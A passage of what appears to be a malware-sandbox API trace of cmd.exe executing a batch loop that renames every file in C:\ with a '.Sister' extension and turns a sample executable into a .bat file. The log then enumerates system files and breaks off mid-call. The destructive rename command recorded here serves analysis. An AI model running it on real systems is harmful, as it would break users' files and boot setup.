0x21ed8c7b100 [0099.089] GetProcessHeap () returned 0x21ed8c70000 [0099.089] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8c77830 [0099.090] GetProcessHeap () returned 0x21ed8c70000 [0099.090] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c380 [0099.090] _wcsicmp (_String1="for", _String2=")") returned 61 [0099.090] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0099.090] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0099.090] GetProcessHeap () returned 0x21ed8c70000 [0099.090] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c440 [0099.090] GetProcessHeap () returned 0x21ed8c70000 [0099.090] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c72900 [0099.090] GetProcessHeap () returned 0x21ed8c70000 [0099.090] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8c7c500 [0099.090] GetProcessHeap () returned 0x21ed8c70000 [0099.090] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c500, Size=0x18) returned 0x21ed8c7c500 [0099.090] GetProcessHeap () returned 0x21ed8c70000 [0099.090] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c500) returned 0x18 [0099.090] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0099.090] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0099.091] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0099.091] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0099.091] _wcsicmp (_String1="IN", _String2="in") returned 0 [0099.091] GetProcessHeap () returned 0x21ed8c70000 [0099.091] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c530 [0099.091] _wcsicmp (_String1="DO", _String2="do") returned 0 [0099.091] _wcsicmp (_String1="ren", _String2=")") returned 73 [0099.091] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0099.091] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0099.091] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0099.091] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0099.091] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0099.091] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0099.092] GetProcessHeap () returned 0x21ed8c70000 [0099.092] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c5f0 [0099.092] GetProcessHeap () returned 0x21ed8c70000 [0099.092] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7b300 [0099.092] GetProcessHeap () returned 0x21ed8c70000 [0099.092] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bf30 [0099.093] _tell (_FileHandle=3) returned 131 [0099.093] _close (_FileHandle=3) returned 0 [0099.093] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0099.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.093] GetFileType (hFile=0x50) returned 0x2 [0099.093] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.093] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0099.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.097] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0099.171] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0099.171] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\") returned 0x3 [0099.171] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\") returned 3 [0099.172] _vsnwprintf (in: _Buffer=0x21ed8e80166, _BufferCount=0x83e2, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0099.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.172] GetFileType (hFile=0x50) returned 0x2 [0099.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.172] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0099.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.173] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x4) returned 1 [0099.177] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0099.177] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.177] GetFileType (hFile=0x50) returned 0x2 [0099.177] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.177] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0099.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.180] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0099.181] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0099.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.181] GetFileType (hFile=0x50) returned 0x2 [0099.181] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.181] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0099.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.184] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0099.212] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*) do ") returned 7 [0099.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.212] GetFileType (hFile=0x50) returned 0x2 [0099.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.212] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0099.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.215] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0099.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.217] GetFileType (hFile=0x50) returned 0x2 [0099.217] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.217] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0099.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.218] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c7b110*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c7b110*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0099.221] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%a\" \"%~a.Sister\" ") returned 19 [0099.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.221] GetFileType (hFile=0x50) returned 0x2 [0099.222] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.222] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0099.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.224] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x13) returned 1 [0099.248] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9e8 | out: _Buffer=" & ") returned 3 [0099.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.248] GetFileType (hFile=0x50) returned 0x2 [0099.248] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.248] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0099.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.259] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0099.264] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe9b8 | out: _Buffer="for") returned 3 [0099.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0099.265] GetFileType (hFile=0x50) returned 0x2 [0099.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0099.265] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0100.582] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.582] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x3) returned 1 [0100.656] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" %a in ") returned 7 [0100.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.656] GetFileType (hFile=0x50) returned 0x2 [0100.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0100.656] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0100.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.702] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x7) returned 1 [0100.707] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0100.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.707] GetFileType (hFile=0x50) returned 0x2 [0100.707] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0100.708] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0100.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.709] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x55) returned 1 [0100.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.712] GetFileType (hFile=0x50) returned 0x2 [0100.712] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0100.712] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0100.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.716] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c7b310*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c7b310*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0100.718] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%~a.Sister\" \"%~na.bat\" ") returned 25 [0100.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.718] GetFileType (hFile=0x50) returned 0x2 [0100.718] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0100.718] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0100.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.720] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x19) returned 1 [0100.724] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0100.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.724] GetFileType (hFile=0x50) returned 0x2 [0100.724] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0100.724] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0100.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0100.725] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0100.727] malloc (_Size=0xffce) returned 0x21ed8e90940 [0100.728] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0100.728] GetProcessHeap () returned 0x21ed8c70000 [0100.728] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7c8f0 [0100.728] GetProcessHeap () returned 0x21ed8c70000 [0100.729] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c7b3a0 [0100.729] GetProcessHeap () returned 0x21ed8c70000 [0100.729] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7d0e0 [0100.729] GetProcessHeap () returned 0x21ed8c70000 [0100.729] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7ca00 [0100.729] GetProcessHeap () returned 0x21ed8c70000 [0100.729] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7ca00, Size=0x16) returned 0x21ed8c7d000 [0100.729] GetProcessHeap () returned 0x21ed8c70000 [0100.729] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d000) returned 0x16 [0100.729] GetProcessHeap () returned 0x21ed8c70000 [0100.729] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c7cd20 [0100.729] FindFirstFileExW (in: lpFileName="*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0x21ed8c7d160 [0100.729] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="588bce7c90097ed212", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="Boot", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Documents and Settings", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="ESD", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab460c6f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Logs", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xaced8ceb, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0100.730] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf74b68f5, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xf74b68f5, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Program Files", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Program Files (x86)", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="ProgramData", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="Recovery", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: hFindFile=0x21ed8c7d160, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xacefef79, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0xd8c00000, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0100.731] FindNextFileW (in: 